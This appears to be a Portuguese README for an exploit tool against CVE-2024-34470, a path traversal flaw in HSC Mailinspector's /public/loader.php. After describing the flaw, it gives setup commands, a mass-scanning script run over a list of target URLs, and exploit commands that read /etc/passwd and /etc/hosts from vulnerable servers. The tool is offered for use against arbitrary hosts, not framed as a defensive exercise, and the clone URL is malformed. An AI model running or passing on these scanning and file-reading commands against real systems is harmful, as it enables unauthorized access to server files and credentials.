
Uma vulnerabilidade crítica foi encontrada no HSC Mailinspector até a versão 5.2.18. Esta vulnerabilidade afeta uma funcionalidade desconhecida do arquivo /public/loader.php.
Uma vulnerabilidade crítica foi encontrada no HSC Mailinspector até a versão 5.2.18. Essa vulnerabilidade afeta uma funcionalidade desconhecida do arquivo /public/loader.php. A manipulação do argumento 'path' com uma entrada desconhecida leva a uma vulnerabilidade de travessia de caminho (path traversal). De acordo com a CWE, esse problema é classificado como CWE-22. O produto usa entrada externa para construir um nome de caminho destinado a identificar um arquivo ou diretório localizado abaixo de um diretório pai restrito, mas o produto não neutraliza adequadamente elementos especiais dentro do nome do caminho que podem fazer com que o caminho resolva para um local fora do diretório restrito. Isso afeta confidencialidade, integridade e disponibilidade.
Clone o repositório:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
Instale as dependências
Certifique-se de ter Python e pip instalados. Em seguida, execute:
pip install -r requirements.txt
Para realizar uma busca por múltiplos alvos usando um arquivo de texto, utilize o script Massive_CVE-2024-34470.py
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
O formato no qual o arquivo urls.txt deve estar é o seguinte:
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
Uma vez identificados os alvos vulneráveis, usamos o script chamado CVE-2024-34470.py para explorar e exibir o conteúdo especificado através do terminal.
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)